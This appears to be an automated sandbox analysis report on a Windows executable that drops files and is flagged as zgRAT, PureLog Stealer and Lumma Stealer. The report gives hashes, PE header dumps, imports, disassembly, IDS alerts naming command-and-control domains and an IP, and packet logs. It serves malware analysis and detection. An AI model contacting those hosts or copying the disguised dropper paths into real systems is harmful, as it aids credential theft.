Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Windows\Speech\kdmapper.exe

Download File

Process:	C:\Windows\System32\curl.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2284739
Entropy (8bit):	7.490456730492454
Encrypted:	false
SSDEEP:	24576:2TbBv5rUyXVRCkLO8zb1Pp8jwaA/KdMg8NxAQv18Ys2sYjb1/k6cMhafck0UneKY:IBJ1LLvax4Gmhscse1D
MD5:	C85ABE0E8C3C4D4C5044AEF6422B8218
SHA1:	F9A4DACEBF1DD80F54DA8C8AFE1DEDDAC99D381D
SHA-256:	7C388F4215D04EEA63A7D5BD9F3CADE715F285EA72DE0E43192FC9F34BAF7C52
SHA-512:	082F4924C624D9B35DFF185B582278E032D3FF230E48739D796BBA250B0807C498EF1B52F78B864AADB35DB0F65463035110C02B7D92DE4FB0A86902CCAD7CB5
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\Speech\kdmapper.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\Speech\kdmapper.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 68%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I.>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I.=>...I..=>..Rich<>..........PE..L..... b............................0........0....@..........................P............@.........................p...4.......P....@....................... ..<#......T............................U..@............0..x....... ....................text............................... ..`.rdata.......0....... ..............@..@.data... G..........................@....didat.......0......................@....rsrc........@......................@..@.reloc..<#... ...$..................@..B................................................................................................................................................................................................................................................

C:\Windows\Speech\physmeme.exe

Download File

Process:	C:\Windows\System32\curl.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	370176
Entropy (8bit):	7.990824056166435
Encrypted:	true
SSDEEP:	6144:uFEE0IJwfawOmaDOEFI2FSCsPOjygLxkxweCyxORzX7rIh0uUWJZtwCiDMf+egqx:uFElvH+KEFLSvVAL7rqDtAIfiq4
MD5:	D6EDF37D68DA356237AE14270B3C7A1A
SHA1:	37FCDB2A0FB6949E710A7E64E181993FD4CBCB29
SHA-256:	D5F6F3242C601E85EEDFF04CD45947F7890E908E51C57F90521EED59C8088B4B
SHA-512:	01CE470A7D19FB9E139C038FF5DD30B6D85409A87B298AE9D3106B5E2EF8712C0D7FC7E4587886DEE47DB040033B9D2D591A0CAFC0001461A0DC07338F0BAA21
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 61%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....W.f................................. ........@.. ....................................`.................................l...O...................................4................................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......p................................................................9m.[...{....V._A.._..X..[m.'..#Q.......[..+H.<..fZ..\|.....m&......y..;KR....7..S..k.m?.8..ID&.!0%N!\.\..L^...0\.....j\|.M.........M.;..q..UO..!'..%. d.E.u......Q-w.$I...X...0d......f.$\|(.gE.N...3.J..T.?.q..\.yX:..W6...t..d.......(.E..n..K.J050....=I3-.x.p.......&{#.,..Vxb.G\.=$...}.C.fgl..`.I.yZ..?.$.'J)....K..............TV.@,...r..q....+....2<ILOS....n<..o.T.~.d:... ..z.>...._.H...

C:\Windows\System32\CSC97DCA7013344A2AA8495395955A7A7.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	1224
Entropy (8bit):	4.435108676655666
Encrypted:	false
SSDEEP:	24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
MD5:	931E1E72E561761F8A74F57989D1EA0A
SHA1:	B66268B9D02EC855EB91A5018C43049B4458AB16
SHA-256:	093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
SHA-512:	1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
Malicious:	false
Preview:	.... ...........................\|...<...............0...........\|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi

C:\Windows\System32\SecurityHealthSystray.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	4608
Entropy (8bit):	3.9733005597854265
Encrypted:	false
SSDEEP:	48:6hpIaPt32M7Jt8Bs3FJsdcV4MKe27iuwUVvqBHyOulajfqXSfbNtm:paPVPc+Vx9MnVvkccjRzNt
MD5:	904849B4C1313623C1FC5BA0D84C716A
SHA1:	951188CD93D9C0622BC3F4AAFF2C39EC4308BFF4
SHA-256:	E914AE7CC2338A6C1A9BAA3A896DBFFD8AB4F5CB928222C4A154D451CF34622D
SHA-512:	A1D9D7E1E125ADB51A0331BCAF76957D274B91C5ACFCE027FCA34E10CED3EF0FE9581DA84DEA3785143EF7F65E5F95AE18DDC4829DA7DAF2EC65B5DA343CE16D
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Z..f.............................'... ...@....@.. ....................................@.................................h'..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..@.............................................................(.....0..!.......r...pre..p.{....(....(....&..&......................0..........ri..p(....&..&......................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(......(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings....4.......#US.........#GUID... ... ...#Blob...........WU........%3................................................................

\Device\ConDrv

Download File

Process:	C:\Windows\Speech\physmeme.exe
File Type:	ASCII text, with CRLF, LF line terminators
Category:	dropped
Size (bytes):	23
Entropy (8bit):	2.5600289361122233
Encrypted:	false
SSDEEP:	3:oWEMo6vvRya:oWEpKvD
MD5:	198AA7622D86723F12D39AA38A10C97F
SHA1:	B3FE9A9637FAF01EFCFCB92AB288F7C91CE87F63
SHA-256:	88866B26B5F228DBEF268709E063E29F5BD89C114921148BEAA92FC2EACD2E2D
SHA-512:	8452029C020F524303144260D478F8F15E2AD5A4BB3F65DB06B62DEA568FAD165949A0FFDE119D7F5C4CA58E87AF660C35CCD54CE78D82BDEB01F6E84E3ED5BA
Malicious:	false
Preview:	012340..1..2..3..4.....

\Device\Null

Download File

Process:	C:\Windows\System32\w32tm.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	151
Entropy (8bit):	4.856868825134652
Encrypted:	false
SSDEEP:	3:VLV993J+miJWEoJ8FX5cUzu3u3AX6vo5XJXXKvj:Vx993DEU+c6UYGJJM
MD5:	EF58A06C531B8472462A3BEB4D9F5674
SHA1:	B75CB305FD1D0FFD73100566A34509EBDAB71B40
SHA-256:	A0D3288B68A68924B8D27C065A1E16FDA5034B27461DE55B6F26C42CE4830ED3
SHA-512:	554ED141B8811455EC3F95D1B99D1AD6A7E6D0775ABE2DEA442642EE9ABEE0FDA25188ACC520284165A63A65D8A623FF0354CAFF9B919B99858B10354B336C40
Malicious:	false
Preview:	Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 30/09/2024 14:22:53..14:22:53, error: 0x80072746.14:22:58, error: 0x80072746.

Static File Info

General

File type:	PE32+ executable (console) x86-64, for MS Windows
Entropy (8bit):	6.72169616575055
TrID:	Win64 Executable Console (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	4tXm5yPtiy.exe
File size:	628'224 bytes
MD5:	cc9824f9940392c9172e05078982caab
SHA1:	0f4e458f24b461d3529ea30bbb1dbc30f8dbc1da
SHA256:	a952acc41933fa2aa78ccc28f45c25928e1ef5c3b72ef3235b99c7bd79e9de40
SHA512:	3f4e15466e35c4c6b19640659d59af783a007672d4c7ad123a604d7409b6f542f00b441ddca27b04dbe6bf34cbdb3b72873a4212824c1086d1b75f085d1ca1fc
SSDEEP:	12288:aaR0UFKC7uFFWuATtUxCj2AqeMQmHnHlaWj:puvCOFWuATtuGKFHnHlZ
TLSH:	9BD4AE4573A58BA4D277613894BBA31BF737B84857318ACB63D040642FE23E05EBB752
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........8..aV..aV..aV......aV...W..aV...U..aV...R..aV...S..aV...W..aV..aW..`V..._..aV......aV...T..aV.Rich.aV........................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x14004b24c
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x66F42F0D [Wed Sep 25 15:41:01 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	11c012ef8b8b753a6c7dfac749804464

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
call 00007F4FE07D841Ch
dec eax
add esp, 28h
jmp 00007F4FE07D7D47h
int3
int3
dec eax
mov dword ptr [esp+10h], ebx
dec eax
mov dword ptr [esp+18h], esi
push ebp
push edi
inc ecx
push esi
dec eax
mov ebp, esp
dec eax
sub esp, 10h
xor eax, eax
xor ecx, ecx
cpuid
inc esp
mov eax, ecx
inc esp
mov edx, edx
inc ecx
xor edx, 49656E69h
inc ecx
xor eax, 6C65746Eh
inc esp
mov ecx, ebx
inc esp
mov esi, eax
xor ecx, ecx
mov eax, 00000001h
cpuid
inc ebp
or edx, eax
mov dword ptr [ebp-10h], eax
inc ecx
xor ecx, 756E6547h
mov dword ptr [ebp-0Ch], ebx
inc ebp
or edx, ecx
mov dword ptr [ebp-08h], ecx
mov edi, ecx
mov dword ptr [ebp-04h], edx
jne 00007F4FE07D7F2Dh
dec eax
or dword ptr [00030DDDh], FFFFFFFFh
and eax, 0FFF3FF0h
dec eax
mov dword ptr [00030DC5h], 00008000h
cmp eax, 000106C0h
je 00007F4FE07D7EFAh
cmp eax, 00020660h
je 00007F4FE07D7EF3h
cmp eax, 00020670h
je 00007F4FE07D7EECh
add eax, FFFCF9B0h
cmp eax, 20h
jnbe 00007F4FE07D7EF6h
dec eax
mov ecx, 00010001h
add dword ptr [eax], eax
add byte ptr [eax], al
dec eax
bt ecx, eax
jnc 00007F4FE07D7EE6h
inc esp
mov eax, dword ptr [0004D25Fh]
inc ecx
or eax, 01h
inc esp
mov dword ptr [0004D254h], eax

Rich Headers

Programming Language:

[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x7945c	0x1a4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x9c000	0x1e8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x99000	0x2dfc	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x9d000	0x240	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x72e90	0x70	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x72f00	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x72d50	0x140	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x4e000	0x850	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x4c3d7	0x4c400	c5747a34f1f33916cf88280589dbd196	False	0.5016617571721311	data	6.49702196538095	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x4e000	0x2d89c	0x2da00	ef802d1d9630a559be4558b95eafa566	False	0.7481538955479452	dBase III DBT, version number 0, next free block index 500750, 1st item "n\236\007"	6.926768893851273	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x7c000	0x1cca8	0x1c000	44ebe2a4353395cec1acbf820001db7a	False	0.45474679129464285	data	5.382551139109846	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x99000	0x2dfc	0x2e00	1a6f5aba31c429bca21c2051fd32a7f3	False	0.47087296195652173	data	5.743578448389907	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x9c000	0x1e8	0x200	031246ef171793b1fc79b2206b5d8bcc	False	0.54296875	data	4.768131151703051	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x9d000	0x240	0x400	1ddc071e3c342b0e48d2b8012851326f	False	0.3994140625	data	3.610359463109381	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x9c060	0x188	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5892857142857143

Imports

DLL	Import
d3d9.dll	Direct3DCreate9Ex
KERNEL32.dll	VirtualFree, GetCurrentProcess, OutputDebugStringA, DeviceIoControl, VirtualAlloc, Thread32Next, Thread32First, CreateFileW, GetCurrentThreadId, GetModuleHandleA, CreateToolhelp32Snapshot, MultiByteToWideChar, Sleep, GetLastError, GetCurrentThread, LoadLibraryA, Process32Next, CloseHandle, K32GetModuleBaseNameA, CreateThread, HeapSetInformation, GetThreadContext, GetProcAddress, GetCurrentProcessId, GetProcessHeap, WideCharToMultiByte, lstrcmpiA, K32EnumProcessModules, GetTickCount, OpenThread, IsDebuggerPresent, CheckRemoteDebuggerPresent, SetLastError, AcquireSRWLockExclusive, WakeAllConditionVariable, SleepConditionVariableSRW, VirtualProtect, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, GetModuleHandleW, GetSystemTimeAsFileTime, InitializeSListHead, LocalFree, FormatMessageA, GetLocaleInfoEx, FindClose, FindFirstFileW, GetFileAttributesExW, AreFileApisANSI, GetFileInformationByHandleEx, Process32First, QueryPerformanceCounter, QueryPerformanceFrequency, GlobalUnlock, GlobalLock, GlobalFree, GlobalAlloc, ReleaseSRWLockExclusive, UnhandledExceptionFilter
USER32.dll	GetActiveWindow, SetClipboardData, ScreenToClient, LoadCursorA, GetKeyState, SendInput, UpdateWindow, GetClipboardData, EmptyClipboard, RegisterClassExA, FindWindowA, GetDesktopWindow, PeekMessageA, LoadIconA, mouse_event, TranslateMessage, ClientToScreen, CreateWindowExA, DefWindowProcA, SetCursor, GetForegroundWindow, MessageBoxA, SetWindowLongA, CloseClipboard, OpenClipboard, GetCursorPos, SetCursorPos, GetAsyncKeyState, ShowWindow, GetSystemMetrics, SetWindowPos, SetLayeredWindowAttributes, GetClientRect, DestroyWindow, GetWindowRect, GetWindow, DispatchMessageA
ADVAPI32.dll	OpenProcessToken, GetTokenInformation
IMM32.dll	ImmReleaseContext, ImmSetCompositionWindow, ImmGetContext
MSVCP140.dll	_Query_perf_frequency, ??1_Lockit@std@@QEAA@XZ, ??0_Lockit@std@@QEAA@H@Z, ?_Throw_Cpp_error@std@@YAXH@Z, ?uncaught_exceptions@std@@YAHXZ, ?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A, ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12@XZ, ?cin@std@@3V?$basic_istream@DU?$char_traits@D@std@@@1@A, ?_Winerror_map@std@@YAHH@Z, ?id@?$codecvt@DDU_Mbstatet@@@std@@2V0locale@2@A, ?_Fiopen@std@@YAPEAU_iobuf@@PEBDHH@Z, ?_Random_device@std@@YAIXZ, ?_Xlength_error@std@@YAXPEBD@Z, ?_Syserror_map@std@@YAPEBDH@Z, _Query_perf_counter, _Thrd_detach, ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@@Z, ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z, ?widen@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBADD@Z, ?put@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@D@Z, ?unshift@?$codecvt@DDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEAD1AEAPEAD@Z, ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ, ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEBA?AVlocale@2@XZ, ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ, ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z, ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ, ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ, ?in@?$codecvt@DDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEBD1AEAPEBDPEAD3AEAPEAD@Z, ?out@?$codecvt@DDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEBD1AEAPEBDPEAD3AEAPEAD@Z, ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z, ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ, ??0?$basic_istream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z, ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAA@XZ, ?showmanyc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAA_JXZ, ?xsgetn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAA_JPEAD_J@Z, ?xsputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAA_JPEBD_J@Z, ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ, ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z, ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UEAA@XZ, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_K@Z, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@M@Z, ??1?$basic_istream@DU?$char_traits@D@std@@@std@@UEAA@XZ, ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z, ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z, ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAM@Z, ?always_noconv@codecvt_base@std@@QEBA_NXZ, ??Bid@locale@std@@QEAA_KXZ
ntdll.dll	RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind
dwmapi.dll	DwmExtendFrameIntoClientArea
VCRUNTIME140_1.dll	__CxxFrameHandler4
VCRUNTIME140.dll	__std_terminate, memchr, strstr, memcmp, memcpy, __std_exception_destroy, __std_exception_copy, memmove, __current_exception, __current_exception_context, __C_specific_handler, _CxxThrowException, memset
api-ms-win-crt-stdio-l1-1-0.dll	__p__commode, _fseeki64, fsetpos, ungetc, _get_stream_buffer_pointers, setvbuf, fgetpos, fclose, __acrt_iob_func, __stdio_common_vsnprintf_s, fflush, fgetc, ftell, fputc, _set_fmode, fseek, __stdio_common_vsprintf_s, __stdio_common_vfprintf, __stdio_common_vsscanf, fread, __stdio_common_vsprintf, _wfopen, fwrite
api-ms-win-crt-string-l1-1-0.dll	strncpy, isprint, strcmp, _stricmp
api-ms-win-crt-utility-l1-1-0.dll	qsort, rand
api-ms-win-crt-heap-l1-1-0.dll	_set_new_mode, _callnewh, free, malloc
api-ms-win-crt-convert-l1-1-0.dll	atof
api-ms-win-crt-runtime-l1-1-0.dll	system, _beginthreadex, terminate, abort, _invalid_parameter_noinfo_noreturn, _register_thread_local_exe_atexit_callback, _c_exit, __p___argv, __p___argc, _exit, _initterm_e, _initterm, _get_initial_narrow_environment, _set_app_type, _seh_filter_exe, _cexit, _crt_atexit, _register_onexit_function, _initialize_onexit_table, _initialize_narrow_environment, _configure_narrow_argv, exit
api-ms-win-crt-math-l1-1-0.dll	atan2, atan2f, ceilf, cosf, asin, fmodf, pow, tanf, powf, sqrtf, __setusermatherr, floorf, sinf, sqrt
api-ms-win-crt-filesystem-l1-1-0.dll	_unlock_file, _lock_file
api-ms-win-crt-locale-l1-1-0.dll	___lc_codepage_func, _configthreadlocale
SHELL32.dll	ShellExecuteW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-09-30T18:25:34.002554+0200	2056172	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tiddymarktwo .shop)	1	192.168.2.8	50097	1.1.1.1	53	UDP
2024-09-30T18:25:34.017153+0200	2056054	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (surveriysiop .shop)	1	192.168.2.8	55617	1.1.1.1	53	UDP
2024-09-30T18:25:34.028835+0200	2056040	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (captainynfanw .shop)	1	192.168.2.8	63708	1.1.1.1	53	UDP
2024-09-30T18:25:34.039669+0200	2056056	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tearrybyiwo .shop)	1	192.168.2.8	65196	1.1.1.1	53	UDP
2024-09-30T18:25:34.053128+0200	2056036	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (appleboltelwk .shop)	1	192.168.2.8	57162	1.1.1.1	53	UDP
2024-09-30T18:25:34.065314+0200	2056058	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tendencerangej .shop)	1	192.168.2.8	57903	1.1.1.1	53	UDP
2024-09-30T18:25:34.078528+0200	2056046	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fossillargeiw .shop)	1	192.168.2.8	53256	1.1.1.1	53	UDP
2024-09-30T18:25:34.091139+0200	2056042	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (coursedonnyre .shop)	1	192.168.2.8	64156	1.1.1.1	53	UDP
2024-09-30T18:25:34.101467+0200	2056052	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (strappystyio .shop)	1	192.168.2.8	53502	1.1.1.1	53	UDP
2024-09-30T18:25:36.659116+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.8	49711	104.21.84.213	443	TCP
2024-09-30T18:25:36.659116+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.8	49711	104.21.84.213	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 30, 2024 18:25:28.395369053 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:28.395417929 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:28.395494938 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:28.416560888 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:28.416583061 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:28.885936975 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:28.886002064 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:28.890034914 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:28.890047073 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:28.890304089 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:28.893358946 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:28.939399958 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.072649956 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.072704077 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.072729111 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.072753906 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.072761059 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.072788954 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.072818041 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.073066950 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.073087931 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.073138952 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.073147058 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.073188066 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.073700905 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.077610016 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.077640057 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.077672958 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.077688932 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.077745914 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.561990976 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.562055111 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.562081099 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.562089920 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.562107086 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.562129974 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.562153101 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.562170029 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.562199116 CEST	443	49706	188.114.96.3	192.168.2.8
